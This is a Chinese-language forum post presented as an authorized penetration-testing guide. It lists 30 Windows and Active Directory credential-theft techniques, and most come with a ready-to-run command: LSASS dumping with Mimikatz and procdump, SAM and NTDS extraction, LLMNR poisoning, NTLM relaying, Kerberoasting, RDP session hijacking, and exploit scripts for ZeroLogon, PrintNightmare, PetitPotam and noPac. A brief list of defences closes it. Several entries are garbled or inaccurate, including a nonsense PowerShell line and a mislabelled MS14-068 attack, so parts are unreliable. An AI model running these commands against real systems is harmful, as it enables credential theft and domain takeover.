本帖最后由 小七 于 2025-4-18 08:25 编辑
在授权渗透测试中,密码凭证的获取往往是突破内网边界的关键。
本文基于合规测试环境,系统梳理Windows系统密码获取的30种技术手段,同时配套防御方案。
所有技术内容仅供安全研究使用,实施前必须取得合法授权。
一、内存凭证提取技术
1. LSASS进程内存解析- • 技术原理:利用Mimikatz的sekurlsa::logonpasswords模块提取登录会话
- • 典型命令:
privilege::debug
sekurlsa::logonpasswords - • 防御方案:启用Credential Guard,限制本地管理员权限
2. 安全描述符转储- • 使用PowerShell调用Windows API读取LSASS句柄
Get-Process lsass | Add-MemberTypeName Security.Descriptor
3. 进程镜像文件分析- • 创建LSASS进程完整dump文件
procdump.exe -ma lsass.exe lsass.dmp
4. 非托管代码注入- • 通过C#反射加载Mimikatz的PE文件
Assembly.Load(DecryptPEBytes()).EntryPoint.Invoke()
5. WDigest缓存提取- • 修改注册表强制启用WDigest缓存
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
6. Kerberos票据分析- • 使用Rubeus导出当前会话的TGT票据
Rubeus.exe dump /nowrap
7. DPAPI凭据解析- • 提取Chrome浏览器保存的密码
SharpChrome.exe logins
8. 虚拟化环境内存取证- • 利用VMSS2Core转换虚拟机快照文件
vmss2core -W12 vmss.vmem
二、本地存储凭证提取(7种)9. SAM数据库破解- • 通过注册表提取哈希
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
10. LSA Secrets解析- • 使用PsExec获取Secrets数据
psexec.exe -s -i regedit.exe
11. 组策略首选项漏洞- • 解密cpassword字段
gpp-decrypt ED4C7D3FE97C3B42
12. 计划任务凭据残留- • 解析XML文件中的RunAsUser字段
Get-ScheduledTask | Select-Object TaskName,Principal
13. IIS应用程序池配置- • 解密applicationHost.config中的密码
aspnet_regiis -pdf "connectionStrings" .
14. 远程桌面凭据管理器- • 使用cmdkey列出保存的凭据
cmdkey /list
15. PowerShell历史记录审计- • 检索控制台历史文件
Get-Content (Get-PSReadlineOption).HistorySavePath
三、网络协议攻击(5种)16. LLMNR/NBT-NS投毒- • 使用Responder捕获NetNTLMv2哈希
python Responder.py -I eth0 -wFb
17. SMB中继攻击- • 配置ntlmrelayx进行哈希转发
ntlmrelayx.py -tf targets.txt -smb2support
18. Kerberoasting攻击- • 请求服务票据进行离线破解
GetUserSPNs.py -request 'domain/user:password'
19. AS-REP Roasting- • 提取不需要预认证的用户哈希
Rubeus.exe asreproast /format:hashcat
20. RDP会话劫持- • 利用tscon服务进行会话接管
query user
tscon %ID% /dest:%SESSIONNAME%
四、漏洞利用技术(5种)21. ZeroLogon(CVE-2020-1472)- • 重置域控机器账户密码
zerologon_tester.py dc_name 192.168.1.1
22. PrintNightmare(CVE-2021-1675)- • 通过打印机服务提权
python3 CVE-2021-1675.py -u user -p password -d domain 192.168.1.1
23. PetitPotam(CVE-2021-36942)- • 强制域控认证
python3 petitpotam.py -d domain -u user -p password 192.168.1.1 192.168.1.2
24. SAM账户名混淆(CVE-2021-42278)- • 创建伪造的域控账户
sam_the_admin.py -domain lab.com -dc-ip 192.168.1.1
25. MS14-068 Kerberos漏洞- • 伪造黄金票据
goldenPac.py domain/user:password@dc.domain.com
五、其他高级技术(5种)26. 域控数据库提取- • 使用ntdsutil创建快照
ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q
27. 组策略脚本审计- • 检索所有GPO中的登录脚本
Get-GPO -All | Get-GPOReport -ReportType XML
28. WMI永久事件订阅- • 创建密码记录触发器
__EventFilter和__EventConsumer绑定
29. 卷影副本分析- • 通过VSS访问历史文件
vssadmin list shadows
mklink /d C:\shadowcopy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
30. BitLocker恢复密钥提取- • 从AD中获取恢复密钥
Get-ADObject -Filter {objectclass -eq 'msFVE-RecoveryInformation'}
【防御建议】- 1. 启用LSA保护(RunAsPPL)
- 2. 部署Windows Defender Credential Guard
- 3. 强制实施NTLM禁用策略
- 4. 定期审计域控事件日志(ID 4662)
- 5. 实施JEA(Just Enough Administration)权限模型
- 6. 配置Kerberos AES加密强制策略
- 7. 部署网络访问控制(802.1X)
- 8. 启用Windows事件转发集中收集
| 
发表于 2025-4-18 08:24:40
